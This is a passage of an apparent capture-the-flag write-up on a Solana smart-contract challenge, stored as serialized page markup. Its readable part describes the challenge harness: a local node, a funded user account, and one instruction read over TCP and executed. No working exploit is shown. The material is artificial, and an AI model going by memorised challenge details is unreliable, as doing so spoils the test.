process",{"type":24,"tag":301,"props":47981,"children":47982},{"style":359},[47983],{"type":30,"value":362},{"type":24,"tag":301,"props":47985,"children":47986},{"style":348},[47987],{"type":30,"value":10550},{"type":24,"tag":301,"props":47989,"children":47990},{"style":369},[47991],{"type":30,"value":21895},{"type":24,"tag":301,"props":47993,"children":47994},{"style":385},[47995],{"type":30,"value":1679},{"type":24,"tag":301,"props":47997,"children":47998},{"style":385},[47999],{"type":30,"value":991},{"type":24,"tag":301,"props":48001,"children":48002},{"style":359},[48003],{"type":30,"value":541},{"type":24,"tag":301,"props":48005,"children":48006},{"style":10246},[48007],{"type":30,"value":10249},{"type":24,"tag":301,"props":48009,"children":48010},{"style":359},[48011],{"type":30,"value":47360},{"type":24,"tag":301,"props":48013,"children":48014},{"class":303,"line":335},[48015,48019],{"type":24,"tag":301,"props":48016,"children":48017},{"style":348},[48018],{"type":30,"value":20626},{"type":24,"tag":301,"props":48020,"children":48021},{"style":359},[48022],{"type":30,"value":3035},{"type":24,"tag":301,"props":48024,"children":48025},{"class":303,"line":344},[48026,48030,48034,48038,48042,48046,48050,48054,48058,48062,48066,48070,48074,48078,48082,48086,48090,48094,48099,48103,48107,48111,48115,48119,48123,48127,48131,48135,48139],{"type":24,"tag":301,"props":48027,"children":48028},{"style":348},[48029],{"type":30,"value":9900},{"type":24,"tag":301,"props":48031,"children":48032},{"style":369},[48033],{"type":30,"value":20650},{"type":24,"tag":301,"props":48035,"children":48036},{"style":385},[48037],{"type":30,"value":2537},{"type":24,"tag":301,"props":48039,"children":48040},{"style":359},[48041],{"type":30,"value":47391},{"type":24,"tag":301,"props":48043,"children":48044},{"style":385},[48045],{"type":30,"value":10308},{"type":24,"tag":301,"props":48047,"children":48048},{"style":359},[48049],{"type":30,"value":47400},{"type":24,"tag":301,"props":48051,"children":48052},{"style":385},[48053],{"type":30,"value":10308},{"type":24,"tag":301,"props":48055,"children":48056},{"style":314},[48057],{"type":30,"value":47409},{"type":24,"tag":301,"props":48059,"children":48060},{"style":385},[48061],{"type":30,"value":10308},{"type":24,"tag":301,"props":48063,"children":48064},{"style":359},[48065],{"type":30,"value":47418},{"type":24,"tag":301,"props":48067,"children":48068},{"style":10246},[48069],{"type":30,"value":10249},{"type":24,"tag":301,"props":48071,"children":48072},{"style":359},[48073],{"type":30,"value":3940},{"type":24,"tag":301,"props":48075,"children":48076},{"style":466},[48077],{"type":30,"value":10900},{"type":24,"tag":301,"props":48079,"children":48080},{"style":359},[48081],{"type":30,"value":551},{"type":24,"tag":301,"props":48083,"children":48084},{"style":348},[48085],{"type":30,"value":27037},{"type":24,"tag":301,"props":48087,"children":48088},{"style":359},[48089],{"type":30,"value":362},{"type":24,"tag":301,"props":48091,"children":48092},{"style":10246},[48093],{"type":30,"value":14857},{"type":24,"tag":301,"props":48095,"children":48096},{"style":359},[48097],{"type":30,"value":48098},")>(",{"type":24,"tag":301,"props":48100,"children":48101},{"style":369},[48102],{"type":30,"value":10528},{"type":24,"tag":301,"props":48104,"children":48105},{"style":359},[48106],{"type":30,"value":541},{"type":24,"tag":301,"props":48108,"children":48109},{"style":385},[48110],{"type":30,"value":9887},{"type":24,"tag":301,"props":48112,"children":48113},{"style":466},[48114],{"type":30,"value":10900},{"type":24,"tag":301,"props":48116,"children":48117},{"style":359},[48118],{"type":30,"value":22200},{"type":24,"tag":301,"props":48120,"children":48121},{"style":385},[48122],{"type":30,"value":206},{"type":24,"tag":301,"props":48124,"children":48125},{"style":314},[48126],{"type":30,"value":32918},{"type":24,"tag":301,"props":48128,"children":48129},{"style":359},[48130],{"type":30,"value":20672},{"type":24,"tag":301,"props":48132,"children":48133},{"style":385},[48134],{"type":30,"value":206},{"type":24,"tag":301,"props":48136,"children":48137},{"style":314},[48138],{"type":30,"value":10492},{"type":24,"tag":301,"props":48140,"children":48141},{"style":359},[48142],{"type":30,"value":22214},{"type":24,"tag":301,"props":48144,"children":48145},{"class":303,"line":401},[48146,48150,48154,48158,48162,48166,48170,48174,48178,48182,48186,48190,48194,48198,48202,48206,48210,48214,48218,48222,48226,48230,48234,48238,48242,48246,48250,48254],{"type":24,"tag":301,"props":48147,"children":48148},{"style":348},[48149],{"type":30,"value":9900},{"type":24,"tag":301,"props":48151,"children":48152},{"style":369},[48153],{"type":30,"value":47506},{"type":24,"tag":301,"props":48155,"children":48156},{"style":385},[48157],{"type":30,"value":2537},{"type":24,"tag":301,"props":48159,"children":48160},{"style":359},[48161],{"type":30,"value":47391},{"type":24,"tag":301,"props":48163,"children":48164},{"style":385},[48165],{"type":30,"value":10308},{"type":24,"tag":301,"props":48167,"children":48168},{"style":359},[48169],{"type":30,"value":47400},{"type":24,"tag":301,"props":48171,"children":48172},{"style":385},[48173],{"type":30,"value":10308},{"type":24,"tag":301,"props":48175,"children":48176},{"style":314},[48177],{"type":30,"value":47409},{"type":24,"tag":301,"props":48179,"children":48180},{"style":385},[48181],{"type":30,"value":10308},{"type":24,"tag":301,"props":48183,"children":48184},{"style":359},[48185],{"type":30,"value":47418},{"type":24,"tag":301,"props":48187,"children":48188},{"style":10246},[48189],{"type":30,"value":10249},{"type":24,"tag":301,"props":48191,"children":48192},{"style":359},[48193],{"type":30,"value":3940},{"type":24,"tag":301,"props":48195,"children":48196},{"style":466},[48197],{"type":30,"value":10900},{"type":24,"tag":301,"props":48199,"children":48200},{"style":359},[48201],{"type":30,"value":551},{"type":24,"tag":301,"props":48203,"children":48204},{"style":10246},[48205],{"type":30,"value":14857},{"type":24,"tag":301,"props":48207,"children":48208},{"style":359},[48209],{"type":30,"value":14426},{"type":24,"tag":301,"props":48211,"children":48212},{"style":369},[48213],{"type":30,"value":10528},{"type":24,"tag":301,"props":48215,"children":48216},{"style":359},[48217],{"type":30,"value":541},{"type":24,"tag":301,"props":48219,"children":48220},{"style":466},[48221],{"type":30,"value":10900},{"type":24,"tag":301,"props":48223,"children":48224},{"style":385},[48225],{"type":30,"value":9887},{"type":24,"tag":301,"props":48227,"children":48228},{"style":466},[48229],{"type":30,"value":3073},{"type":24,"tag":301,"props":48231,"children":48232},{"style":359},[48233],{"type":30,"value":22200},{"type":24,"tag":301,"props":48235,"children":48236},{"style":385},[48237],{"type":30,"value":206},{"type":24,"tag":301,"props":48239,"children":48240},{"style":314},[48241],{"type":30,"value":32918},{"type":24,"tag":301,"props":48243,"children":48244},{"style":359},[48245],{"type":30,"value":20672},{"type":24,"tag":301,"props":48247,"children":48248},{"style":385},[48249],{"type":30,"value":206},{"type":24,"tag":301,"props":48251,"children":48252},{"style":314},[48253],{"type":30,"value":10492},{"type":24,"tag":301,"props":48255,"children":48256},{"style":359},[48257],{"type":30,"value":22214},{"type":24,"tag":301,"props":48259,"children":48260},{"class":303,"line":415},[48261,48265,48269,48273],{"type":24,"tag":301,"props":48262,"children":48263},{"style":314},[48264],{"type":30,"value":47618},{"type":24,"tag":301,"props":48266,"children":48267},{"style":359},[48268],{"type":30,"value":362},{"type":24,"tag":301,"props":48270,"children":48271},{"style":369},[48272],{"type":30,"value":19427},{"type":24,"tag":301,"props":48274,"children":48275},{"style":359},[48276],{"type":30,"value":589},{"type":24,"tag":301,"props":48278,"children":48279},{"class":303,"line":439},[48280],{"type":24,"tag":301,"props":48281,"children":48282},{"emptyLinePlaceholder":16},[48283],{"type":30,"value":341},{"type":24,"tag":301,"props":48285,"children":48286},{"class":303,"line":447},[48287,48291,48295,48299,48303,48307,48311,48315],{"type":24,"tag":301,"props":48288,"children":48289},{"style":369},[48290],{"type":30,"value":47789},{"type":24,"tag":301,"props":48292,"children":48293},{"style":385},[48294],{"type":30,"value":2537},{"type":24,"tag":301,"props":48296,"children":48297},{"style":385},[48298],{"type":30,"value":991},{"type":24,"tag":301,"props":48300,"children":48301},{"style":369},[48302],{"type":30,"value":10528},{"type":24,"tag":301,"props":48304,"children":48305},{"style":359},[48306],{"type":30,"value":541},{"type":24,"tag":301,"props":48308,"children":48309},{"style":466},[48310],{"type":30,"value":3073},{"type":24,"tag":301,"props":48312,"children":48313},{"style":385},[48314],{"type":30,"value":9887},{"type":24,"tag":301,"props":48316,"children":48317},{"style":359},[48318],{"type":30,"value":1423},{"type":24,"tag":301,"props":48320,"children":48321},{"class":303,"line":476},[48322],{"type":24,"tag":301,"props":48323,"children":48324},{"emptyLinePlaceholder":16},[48325],{"type":30,"value":341},{"type":24,"tag":301,"props":48327,"children":48328},{"class":303,"line":495},[48329,48333,48337,48341,48345,48349,48353,48357,48361,48365,48369,48373,48377,48381,48385,48389,48393,48397,48401,48405,48409,48413,48417,48421,48425,48429,48433,48437,48441],{"type":24,"tag":301,"props":48330,"children":48331},{"style":348},[48332],{"type":30,"value":9900},{"type":24,"tag":301,"props":48334,"children":48335},{"style":369},[48336],{"type":30,"value":20650},{"type":24,"tag":301,"props":48338,"children":48339},{"style":385},[48340],{"type":30,"value":2537},{"type":24,"tag":301,"props":48342,"children":48343},{"style":359},[48344],{"type":30,"value":47391},{"type":24,"tag":301,"props":48346,"children":48347},{"style":385},[48348],{"type":30,"value":10308},{"type":24,"tag":301,"props":48350,"children":48351},{"style":359},[48352],{"type":30,"value":47400},{"type":24,"tag":301,"props":48354,"children":48355},{"style":385},[48356],{"type":30,"value":10308},{"type":24,"tag":301,"props":48358,"children":48359},{"style":314},[48360],{"type":30,"value":47409},{"type":24,"tag":301,"props":48362,"children":48363},{"style":385},[48364],{"type":30,"value":10308},{"type":24,"tag":301,"props":48366,"children":48367},{"style":359},[48368],{"type":30,"value":47418},{"type":24,"tag":301,"props":48370,"children":48371},{"style":10246},[48372],{"type":30,"value":10249},{"type":24,"tag":301,"props":48374,"children":48375},{"style":359},[48376],{"type":30,"value":3940},{"type":24,"tag":301,"props":48378,"children":48379},{"style":466},[48380],{"type":30,"value":10900},{"type":24,"tag":301,"props":48382,"children":48383},{"style":359},[48384],{"type":30,"value":551},{"type":24,"tag":301,"props":48386,"children":48387},{"style":348},[48388],{"type":30,"value":27037},{"type":24,"tag":301,"props":48390,"children":48391},{"style":359},[48392],{"type":30,"value":362},{"type":24,"tag":301,"props":48394,"children":48395},{"style":10246},[48396],{"type":30,"value":14857},{"type":24,"tag":301,"props":48398,"children":48399},{"style":359},[48400],{"type":30,"value":48098},{"type":24,"tag":301,"props":48402,"children":48403},{"style":369},[48404],{"type":30,"value":10528},{"type":24,"tag":301,"props":48406,"children":48407},{"style":359},[48408],{"type":30,"value":541},{"type":24,"tag":301,"props":48410,"children":48411},{"style":385},[48412],{"type":30,"value":9887},{"type":24,"tag":301,"props":48414,"children":48415},{"style":466},[48416],{"type":30,"value":10900},{"type":24,"tag":301,"props":48418,"children":48419},{"style":359},[48420],{"type":30,"value":22200},{"type":24,"tag":301,"props":48422,"children":48423},{"style":385},[48424],{"type":30,"value":206},{"type":24,"tag":301,"props":48426,"children":48427},{"style":314},[48428],{"type":30,"value":32918},{"type":24,"tag":301,"props":48430,"children":48431},{"style":359},[48432],{"type":30,"value":20672},{"type":24,"tag":301,"props":48434,"children":48435},{"style":385},[48436],{"type":30,"value":206},{"type":24,"tag":301,"props":48438,"children":48439},{"style":314},[48440],{"type":30,"value":10492},{"type":24,"tag":301,"props":48442,"children":48443},{"style":359},[48444],{"type":30,"value":22214},{"type":24,"tag":301,"props":48446,"children":48447},{"class":303,"line":504},[48448,48452,48456,48460,48464,48468,48472,48476,48480,48484,48488,48492,48496,48500,48504,48508,48512,48516,48520,48524,48528,48532,48536,48540,48544,48548,48552,48556],{"type":24,"tag":301,"props":48449,"children":48450},{"style":348},[48451],{"type":30,"value":9900},{"type":24,"tag":301,"props":48453,"children":48454},{"style":369},[48455],{"type":30,"value":47506},{"type":24,"tag":301,"props":48457,"children":48458},{"style":385},[48459],{"type":30,"value":2537},{"type":24,"tag":301,"props":48461,"children":48462},{"style":359},[48463],{"type":30,"value":47391},{"type":24,"tag":301,"props":48465,"children":48466},{"style":385},[48467],{"type":30,"value":10308},{"type":24,"tag":301,"props":48469,"children":48470},{"style":359},[48471],{"type":30,"value":47400},{"type":24,"tag":301,"props":48473,"children":48474},{"style":385},[48475],{"type":30,"value":10308},{"type":24,"tag":301,"props":48477,"children":48478},{"style":314},[48479],{"type":30,"value":47409},{"type":24,"tag":301,"props":48481,"children":48482},{"style":385},[48483],{"type":30,"value":10308},{"type":24,"tag":301,"props":48485,"children":48486},{"style":359},[48487],{"type":30,"value":47418},{"type":24,"tag":301,"props":48489,"children":48490},{"style":10246},[48491],{"type":30,"value":10249},{"type":24,"tag":301,"props":48493,"children":48494},{"style":359},[48495],{"type":30,"value":3940},{"type":24,"tag":301,"props":48497,"children":48498},{"style":466},[48499],{"type":30,"value":10900},{"type":24,"tag":301,"props":48501,"children":48502},{"style":359},[48503],{"type":30,"value":551},{"type":24,"tag":301,"props":48505,"children":48506},{"style":10246},[48507],{"type":30,"value":14857},{"type":24,"tag":301,"props":48509,"children":48510},{"style":359},[48511],{"type":30,"value":14426},{"type":24,"tag":301,"props":48513,"children":48514},{"style":369},[48515],{"type":30,"value":10528},{"type":24,"tag":301,"props":48517,"children":48518},{"style":359},[48519],{"type":30,"value":541},{"type":24,"tag":301,"props":48521,"children":48522},{"style":466},[48523],{"type":30,"value":10900},{"type":24,"tag":301,"props":48525,"children":48526},{"style":385},[48527],{"type":30,"value":9887},{"type":24,"tag":301,"props":48529,"children":48530},{"style":466},[48531],{"type":30,"value":3073},{"type":24,"tag":301,"props":48533,"children":48534},{"style":359},[48535],{"type":30,"value":22200},{"type":24,"tag":301,"props":48537,"children":48538},{"style":385},[48539],{"type":30,"value":206},{"type":24,"tag":301,"props":48541,"children":48542},{"style":314},[48543],{"type":30,"value":32918},{"type":24,"tag":301,"props":48545,"children":48546},{"style":359},[48547],{"type":30,"value":20672},{"type":24,"tag":301,"props":48549,"children":48550},{"style":385},[48551],{"type":30,"value":206},{"type":24,"tag":301,"props":48553,"children":48554},{"style":314},[48555],{"type":30,"value":10492},{"type":24,"tag":301,"props":48557,"children":48558},{"style":359},[48559],{"type":30,"value":22214},{"type":24,"tag":301,"props":48561,"children":48562},{"class":303,"line":512},[48563,48567,48571,48575],{"type":24,"tag":301,"props":48564,"children":48565},{"style":314},[48566],{"type":30,"value":47618},{"type":24,"tag":301,"props":48568,"children":48569},{"style":359},[48570],{"type":30,"value":362},{"type":24,"tag":301,"props":48572,"children":48573},{"style":369},[48574],{"type":30,"value":19427},{"type":24,"tag":301,"props":48576,"children":48577},{"style":359},[48578],{"type":30,"value":589},{"type":24,"tag":301,"props":48580,"children":48581},{"class":303,"line":592},[48582],{"type":24,"tag":301,"props":48583,"children":48584},{"style":359},[48585],{"type":30,"value":501},{"type":24,"tag":301,"props":48587,"children":48588},{"class":303,"line":619},[48589],{"type":24,"tag":301,"props":48590,"children":48591},{"style":359},[48592],{"type":30,"value":698},{"type":24,"tag":80,"props":48594,"children":48596},{"id":48595},"test-environment",[48597],{"type":30,"value":48598},"Test Environment",{"type":24,"tag":32,"props":48600,"children":48601},{},[48602],{"type":30,"value":48603},"To understand our capabilites regarding interaction with the program and determine what is necessary to get the flag, we must analyze the test environment.",{"type":24,"tag":32,"props":48605,"children":48606},{},[48607,48609,48615],{"type":30,"value":48608},"When you connect to the server through a tcp connection, ",{"type":24,"tag":145,"props":48610,"children":48612},{"className":48611},[],[48613],{"type":30,"value":48614},"framework/src/main.rs::handle_connection",{"type":30,"value":48616}," gets executed, which does the following:",{"type":24,"tag":6246,"props":48618,"children":48619},{},[48620],{"type":24,"tag":2659,"props":48621,"children":48622},{},[48623],{"type":30,"value":48624},"Creates a new Solana local node",{"type":24,"tag":291,"props":48626,"children":48628},{"className":9818,"code":48627,"language":9817,"meta":7,"style":7},"let mut builder = ChallengeBuilder::try_from(socket.try_clone().unwrap()).unwrap();\nassert!(builder.add_program(\"/path/to/chall.so\", Some(chall::ID)) == chall::ID);\nlet mut chall = builder.build().await;\n",[48629],{"type":24,"tag":145,"props":48630,"children":48631},{"__ignoreMap":7},[48632,48713,48789],{"type":24,"tag":301,"props":48633,"children":48634},{"class":303,"line":304},[48635,48639,48643,48648,48652,48657,48661,48666,48670,48675,48679,48684,48688,48692,48696,48701,48705,48709],{"type":24,"tag":301,"props":48636,"children":48637},{"style":348},[48638],{"type":30,"value":3258},{"type":24,"tag":301,"props":48640,"children":48641},{"style":348},[48642],{"type":30,"value":9843},{"type":24,"tag":301,"props":48644,"children":48645},{"style":369},[48646],{"type":30,"value":48647}," builder",{"type":24,"tag":301,"props":48649,"children":48650},{"style":385},[48651],{"type":30,"value":2537},{"type":24,"tag":301,"props":48653,"children":48654},{"style":10246},[48655],{"type":30,"value":48656}," ChallengeBuilder",{"type":24,"tag":301,"props":48658,"children":48659},{"style":385},[48660],{"type":30,"value":10308},{"type":24,"tag":301,"props":48662,"children":48663},{"style":314},[48664],{"type":30,"value":48665},"try_from",{"type":24,"tag":301,"props":48667,"children":48668},{"style":359},[48669],{"type":30,"value":362},{"type":24,"tag":301,"props":48671,"children":48672},{"style":369},[48673],{"type":30,"value":48674},"socket",{"type":24,"tag":301,"props":48676,"children":48677},{"style":385},[48678],{"type":30,"value":206},{"type":24,"tag":301,"props":48680,"children":48681},{"style":314},[48682],{"type":30,"value":48683},"try_clone",{"type":24,"tag":301,"props":48685,"children":48686},{"style":359},[48687],{"type":30,"value":20672},{"type":24,"tag":301,"props":48689,"children":48690},{"style":385},[48691],{"type":30,"value":206},{"type":24,"tag":301,"props":48693,"children":48694},{"style":314},[48695],{"type":30,"value":10492},{"type":24,"tag":301,"props":48697,"children":48698},{"style":359},[48699],{"type":30,"value":48700},"())",{"type":24,"tag":301,"props":48702,"children":48703},{"style":385},[48704],{"type":30,"value":206},{"type":24,"tag":301,"props":48706,"children":48707},{"style":314},[48708],{"type":30,"value":10492},{"type":24,"tag":301,"props":48710,"children":48711},{"style":359},[48712],{"type":30,"value":4859},{"type":24,"tag":301,"props":48714,"children":48715},{"class":303,"line":320},[48716,48721,48725,48730,48734,48739,48743,48748,48752,48757,48762,48766,48771,48775,48780,48784],{"type":24,"tag":301,"props":48717,"children":48718},{"style":314},[48719],{"type":30,"value":48720},"assert!",{"type":24,"tag":301,"props":48722,"children":48723},{"style":359},[48724],{"type":30,"value":362},{"type":24,"tag":301,"props":48726,"children":48727},{"style":369},[48728],{"type":30,"value":48729},"builder",{"type":24,"tag":301,"props":48731,"children":48732},{"style":385},[48733],{"type":30,"value":206},{"type":24,"tag":301,"props":48735,"children":48736},{"style":314},[48737],{"type":30,"value":48738},"add_program",{"type":24,"tag":301,"props":48740,"children":48741},{"style":359},[48742],{"type":30,"value":362},{"type":24,"tag":301,"props":48744,"children":48745},{"style":329},[48746],{"type":30,"value":48747},"\"/path/to/chall.so\"",{"type":24,"tag":301,"props":48749,"children":48750},{"style":359},[48751],{"type":30,"value":377},{"type":24,"tag":301,"props":48753,"children":48754},{"style":10246},[48755],{"type":30,"value":48756},"Some",{"type":24,"tag":301,"props":48758,"children":48759},{"style":359},[48760],{"type":30,"value":48761},"(chall",{"type":24,"tag":301,"props":48763,"children":48764},{"style":385},[48765],{"type":30,"value":10308},{"type":24,"tag":301,"props":48767,"children":48768},{"style":359},[48769],{"type":30,"value":48770},"ID)) ",{"type":24,"tag":301,"props":48772,"children":48773},{"style":385},[48774],{"type":30,"value":607},{"type":24,"tag":301,"props":48776,"children":48777},{"style":359},[48778],{"type":30,"value":48779}," chall",{"type":24,"tag":301,"props":48781,"children":48782},{"style":385},[48783],{"type":30,"value":10308},{"type":24,"tag":301,"props":48785,"children":48786},{"style":359},[48787],{"type":30,"value":48788},"ID);\n",{"type":24,"tag":301,"props":48790,"children":48791},{"class":303,"line":335},[48792,48796,48800,48804,48808,48812,48816,48821,48825,48829,48833],{"type":24,"tag":301,"props":48793,"children":48794},{"style":348},[48795],{"type":30,"value":3258},{"type":24,"tag":301,"props":48797,"children":48798},{"style":348},[48799],{"type":30,"value":9843},{"type":24,"tag":301,"props":48801,"children":48802},{"style":369},[48803],{"type":30,"value":48779},{"type":24,"tag":301,"props":48805,"children":48806},{"style":385},[48807],{"type":30,"value":2537},{"type":24,"tag":301,"props":48809,"children":48810},{"style":369},[48811],{"type":30,"value":48647},{"type":24,"tag":301,"props":48813,"children":48814},{"style":385},[48815],{"type":30,"value":206},{"type":24,"tag":301,"props":48817,"children":48818},{"style":314},[48819],{"type":30,"value":48820},"build",{"type":24,"tag":301,"props":48822,"children":48823},{"style":359},[48824],{"type":30,"value":20672},{"type":24,"tag":301,"props":48826,"children":48827},{"style":385},[48828],{"type":30,"value":206},{"type":24,"tag":301,"props":48830,"children":48831},{"style":308},[48832],{"type":30,"value":39666},{"type":24,"tag":301,"props":48834,"children":48835},{"style":359},[48836],{"type":30,"value":492},{"type":24,"tag":6246,"props":48838,"children":48839},{"start":320},[48840],{"type":24,"tag":2659,"props":48841,"children":48842},{},[48843],{"type":30,"value":48844},"Funds the user account with 100 SOL",{"type":24,"tag":291,"props":48846,"children":48848},{"className":9818,"code":48847,"language":9817,"meta":7,"style":7},"let user_keypair = Keypair::new();\nlet user = user_keypair.pubkey();\n\nlet payer_keypair = &chall.ctx.payer;\nlet payer = payer_keypair.pubkey();\n\nchall\n .run_ix(system_instruction::transfer(&payer, &user, 100_000_000_000))\n .await?;\n\nwriteln!(socket, \"user: {}\", user)?;\n",[48849],{"type":24,"tag":145,"props":48850,"children":48851},{"__ignoreMap":7},[48852,48885,48917,48924,48966,48998,49005,49013,49077,49096,49103],{"type":24,"tag":301,"props":48853,"children":48854},{"class":303,"line":304},[48855,48859,48864,48868,48873,48877,48881],{"type":24,"tag":301,"props":48856,"children":48857},{"style":348},[48858],{"type":30,"value":3258},{"type":24,"tag":301,"props":48860,"children":48861},{"style":369},[48862],{"type":30,"value":48863}," user_keypair",{"type":24,"tag":301,"props":48865,"children":48866},{"style":385},[48867],{"type":30,"value":2537},{"type":24,"tag":301,"props":48869,"children":48870},{"style":10246},[48871],{"type":30,"value":48872}," Keypair",{"type":24,"tag":301,"props":48874,"children":48875},{"style":385},[48876],{"type":30,"value":10308},{"type":24,"tag":301,"props":48878,"children":48879},{"style":314},[48880],{"type":30,"value":21913},{"type":24,"tag":301,"props":48882,"children":48883},{"style":359},[48884],{"type":30,"value":4859},{"type":24,"tag":301,"props":48886,"children":48887},{"class":303,"line":320},[48888,48892,48897,48901,48905,48909,48913],{"type":24,"tag":301,"props":48889,"children":48890},{"style":348},[48891],{"type":30,"value":3258},{"type":24,"tag":301,"props":48893,"children":48894},{"style":369},[48895],{"type":30,"value":48896}," user",{"type":24,"tag":301,"props":48898,"children":48899},{"style":385},[48900],{"type":30,"value":2537},{"type":24,"tag":301,"props":48902,"children":48903},{"style":369},[48904],{"type":30,"value":48863},{"type":24,"tag":301,"props":48906,"children":48907},{"style":385},[48908],{"type":30,"value":206},{"type":24,"tag":301,"props":48910,"children":48911},{"style":314},[48912],{"type":30,"value":10371},{"type":24,"tag":301,"props":48914,"children":48915},{"style":359},[48916],{"type":30,"value":4859},{"type":24,"tag":301,"props":48918,"children":48919},{"class":303,"line":335},[48920],{"type":24,"tag":301,"props":48921,"children":48922},{"emptyLinePlaceholder":16},[48923],{"type":30,"value":341},{"type":24,"tag":301,"props":48925,"children":48926},{"class":303,"line":344},[48927,48931,48936,48940,48944,48949,48953,48957,48961],{"type":24,"tag":301,"props":48928,"children":48929},{"style":348},[48930],{"type":30,"value":3258},{"type":24,"tag":301,"props":48932,"children":48933},{"style":369},[48934],{"type":30,"value":48935}," payer_keypair",{"type":24,"tag":301,"props":48937,"children":48938},{"style":385},[48939],{"type":30,"value":2537},{"type":24,"tag":301,"props":48941,"children":48942},{"style":385},[48943],{"type":30,"value":991},{"type":24,"tag":301,"props":48945,"children":48946},{"style":369},[48947],{"type":30,"value":48948},"chall",{"type":24,"tag":301,"props":48950,"children":48951},{"style":385},[48952],{"type":30,"value":206},{"type":24,"tag":301,"props":48954,"children":48955},{"style":359},[48956],{"type":30,"value":27051},{"type":24,"tag":301,"props":48958,"children":48959},{"style":385},[48960],{"type":30,"value":206},{"type":24,"tag":301,"props":48962,"children":48963},{"style":359},[48964],{"type":30,"value":48965},"payer;\n",{"type":24,"tag":301,"props":48967,"children":48968},{"class":303,"line":401},[48969,48973,48978,48982,48986,48990,48994],{"type":24,"tag":301,"props":48970,"children":48971},{"style":348},[48972],{"type":30,"value":3258},{"type":24,"tag":301,"props":48974,"children":48975},{"style":369},[48976],{"type":30,"value":48977}," payer",{"type":24,"tag":301,"props":48979,"children":48980},{"style":385},[48981],{"type":30,"value":2537},{"type":24,"tag":301,"props":48983,"children":48984},{"style":369},[48985],{"type":30,"value":48935},{"type":24,"tag":301,"props":48987,"children":48988},{"style":385},[48989],{"type":30,"value":206},{"type":24,"tag":301,"props":48991,"children":48992},{"style":314},[48993],{"type":30,"value":10371},{"type":24,"tag":301,"props":48995,"children":48996},{"style":359},[48997],{"type":30,"value":4859},{"type":24,"tag":301,"props":48999,"children":49000},{"class":303,"line":415},[49001],{"type":24,"tag":301,"props":49002,"children":49003},{"emptyLinePlaceholder":16},[49004],{"type":30,"value":341},{"type":24,"tag":301,"props":49006,"children":49007},{"class":303,"line":439},[49008],{"type":24,"tag":301,"props":49009,"children":49010},{"style":369},[49011],{"type":30,"value":49012},"chall\n",{"type":24,"tag":301,"props":49014,"children":49015},{"class":303,"line":447},[49016,49021,49026,49031,49035,49039,49043,49047,49052,49056,49060,49064,49068,49073],{"type":24,"tag":301,"props":49017,"children":49018},{"style":385},[49019],{"type":30,"value":49020}," .",{"type":24,"tag":301,"props":49022,"children":49023},{"style":314},[49024],{"type":30,"value":49025},"run_ix",{"type":24,"tag":301,"props":49027,"children":49028},{"style":359},[49029],{"type":30,"value":49030},"(system_instruction",{"type":24,"tag":301,"props":49032,"children":49033},{"style":385},[49034],{"type":30,"value":10308},{"type":24,"tag":301,"props":49036,"children":49037},{"style":314},[49038],{"type":30,"value":38875},{"type":24,"tag":301,"props":49040,"children":49041},{"style":359},[49042],{"type":30,"value":362},{"type":24,"tag":301,"props":49044,"children":49045},{"style":385},[49046],{"type":30,"value":556},{"type":24,"tag":301,"props":49048,"children":49049},{"style":369},[49050],{"type":30,"value":49051},"payer",{"type":24,"tag":301,"props":49053,"children":49054},{"style":359},[49055],{"type":30,"value":377},{"type":24,"tag":301,"props":49057,"children":49058},{"style":385},[49059],{"type":30,"value":556},{"type":24,"tag":301,"props":49061,"children":49062},{"style":369},[49063],{"type":30,"value":27003},{"type":24,"tag":301,"props":49065,"children":49066},{"style":359},[49067],{"type":30,"value":377},{"type":24,"tag":301,"props":49069,"children":49070},{"style":466},[49071],{"type":30,"value":49072},"100_000_000_000",{"type":24,"tag":301,"props":49074,"children":49075},{"style":359},[49076],{"type":30,"value":9381},{"type":24,"tag":301,"props":49078,"children":49079},{"class":303,"line":476},[49080,49084,49088,49092],{"type":24,"tag":301,"props":49081,"children":49082},{"style":385},[49083],{"type":30,"value":49020},{"type":24,"tag":301,"props":49085,"children":49086},{"style":308},[49087],{"type":30,"value":39666},{"type":24,"tag":301,"props":49089,"children":49090},{"style":385},[49091],{"type":30,"value":2003},{"type":24,"tag":301,"props":49093,"children":49094},{"style":359},[49095],{"type":30,"value":492},{"type":24,"tag":301,"props":49097,"children":49098},{"class":303,"line":495},[49099],{"type":24,"tag":301,"props":49100,"children":49101},{"emptyLinePlaceholder":16},[49102],{"type":30,"value":341},{"type":24,"tag":301,"props":49104,"children":49105},{"class":303,"line":504},[49106,49111,49115,49119,49123,49128,49132,49136,49140,49144],{"type":24,"tag":301,"props":49107,"children":49108},{"style":314},[49109],{"type":30,"value":49110},"writeln!",{"type":24,"tag":301,"props":49112,"children":49113},{"style":359},[49114],{"type":30,"value":362},{"type":24,"tag":301,"props":49116,"children":49117},{"style":369},[49118],{"type":30,"value":48674},{"type":24,"tag":301,"props":49120,"children":49121},{"style":359},[49122],{"type":30,"value":377},{"type":24,"tag":301,"props":49124,"children":49125},{"style":329},[49126],{"type":30,"value":49127},"\"user: {}\"",{"type":24,"tag":301,"props":49129,"children":49130},{"style":359},[49131],{"type":30,"value":377},{"type":24,"tag":301,"props":49133,"children":49134},{"style":369},[49135],{"type":30,"value":27003},{"type":24,"tag":301,"props":49137,"children":49138},{"style":359},[49139],{"type":30,"value":9961},{"type":24,"tag":301,"props":49141,"children":49142},{"style":385},[49143],{"type":30,"value":2003},{"type":24,"tag":301,"props":49145,"children":49146},{"style":359},[49147],{"type":30,"value":492},{"type":24,"tag":6246,"props":49149,"children":49150},{"start":335},[49151],{"type":24,"tag":2659,"props":49152,"children":49153},{},[49154],{"type":30,"value":49155},"Reads an instruction from the tcp stream and executes it",{"type":24,"tag":291,"props":49157,"children":49159},{"className":9818,"code":49158,"language":9817,"meta":7,"style":7},"let solve_ix = chall.read_instruction(chall::ID)?;\nchall.run_ixs_full(&[solve_ix], &[&user_keypair], &user).await?;\n",[49160],{"type":24,"tag":145,"props":49161,"children":49162},{"__ignoreMap":7},[49163,49213],{"type":24,"tag":301,"props":49164,"children":49165},{"class":303,"line":304},[49166,49170,49175,49179,49183,49187,49192,49196,49200,49205,49209],{"type":24,"tag":301,"props":49167,"children":49168},{"style":348},[49169],{"type":30,"value":3258},{"type":24,"tag":301,"props":49171,"children":49172},{"style":369},[49173],{"type":30,"value":49174}," 